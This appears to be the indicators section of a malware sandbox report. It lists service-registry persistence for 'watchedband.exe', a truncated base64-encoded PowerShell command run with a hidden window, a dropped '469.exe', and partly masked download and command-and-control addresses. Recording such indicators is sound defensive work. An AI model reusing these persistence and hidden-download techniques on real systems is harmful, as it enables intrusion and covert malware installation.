Technical Information
- [<HKLM>\System\CurrentControlSet\Services\watchedband] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\watchedband] 'ImagePath' = '"%WINDIR%\SysWOW64\watchedband.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABQAGgAYQB1AGIAZQBtAGkAaQBkAGwAeQBiAD0AJwBBAHUAYwBhAHQAegBjAHcAJwA7ACQAVQBlAGcAYQBwAG0AcwBqAGMAIAA9ACAAJwA0ADYAOQAnADsAJABTAGcAagB1AHQAagBoAG8AZABiAHIAbwA9ACcAUQBkAGgAZABpAGYAZQBoAG0AbQB...
- %HOMEPATH%\469.exe
- from %HOMEPATH%\469.exe to %WINDIR%\syswow64\watchedband.exe
- http://ma######n.feb.unair.ac.id/gcbme/SU5/
- http://74.###.125.192:443/balloon/arizona/ via 74.##8.125.192
- DNS ASK ma######n.feb.unair.ac.id
- '%HOMEPATH%\469.exe'
- '%WINDIR%\syswow64\watchedband.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABQAGgAYQB1AGIAZQBtAGkAaQBkAGwAeQBiAD0AJwBBAHUAYwBhAHQAegBjAHcAJwA7ACQAVQBlAGcAYQBwAG0AcwBqAGMAIAA9ACAAJwA0ADYAOQAnADsAJABTAGcAagB1AHQAagBoAG8AZABiAHIAbwA9ACcAUQBkAGgAZABpAGYAZQBoAG0AbQB...' (with hidden window)